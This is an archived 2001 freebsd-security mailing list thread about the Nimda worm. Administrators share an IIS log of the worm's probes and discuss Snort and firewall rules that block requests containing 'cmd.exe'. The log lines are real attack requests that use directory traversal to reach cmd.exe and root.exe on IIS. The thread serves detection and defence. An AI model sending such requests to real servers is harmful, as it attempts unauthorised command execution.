From owner-freebsd-security Tue Sep 18 14:54:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from cpimssmtpu12.email.msn.com (cpimssmtpu12.email.msn.com [207.46.181.87]) by hub.freebsd.org (Postfix) with ESMTP id E4CDB37B413 for ; Tue, 18 Sep 2001 14:54:39 -0700 (PDT) Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu12.email.msn.com with Microsoft SMTPSVC(5.0.2195.3779); Tue, 18 Sep 2001 14:54:06 -0700 Message-ID: <010a01c1408c$82bf0380$0101a8c0@development.local> From: "John Howie" To: "Derek O'Flynn" , , "Brett Glass" References: <4.3.2.7.2.20010918153412.0493bc10@localhost> Subject: Re: NIMDA Virus Date: Tue, 18 Sep 2001 14:54:36 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-OriginalArrivalTime: 18 Sep 2001 21:54:07.0028 (UTC) FILETIME=[70826F40:01C1408C] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Probably not enough - the Hydra (two-heads) is also doing NetBIOS queries. The example log below shows the entrire attack from an IIS standpoint. I have no example of the NetBIOS attack pattern because we haven't been infected. john... 2001-09-18 13:21:25 216.210.XXX.XXX- 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 - 2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 - 2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - ----- Original Message ----- From: "Brett Glass" To: "Derek O'Flynn" ; Sent: Tuesday, September 18, 2001 2:39 PM Subject: Re: NIMDA Virus > We just put a log monitor on the Apache server, and are firewalling anything > that sends a request with "cmd.exe" in it. Quite effective. > > --Brett > > > At 03:31 PM 9/18/2001, Derek O'Flynn wrote: > > >Has anyone successfully written a rule for snort to alert to this? > > > >I'm currently running snort 1.8 with flex-resp. > > > >I would like to have a rule that identifies the attacks and then sends the tcp_rst command so that the worm can't infect new machines. I have the information for the rule, just need to know what to put in the content field to verify that it is nimda. > > > >Thanks, > >Derek O'Flynn > > > > > >_________________________________________________________________ > >Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message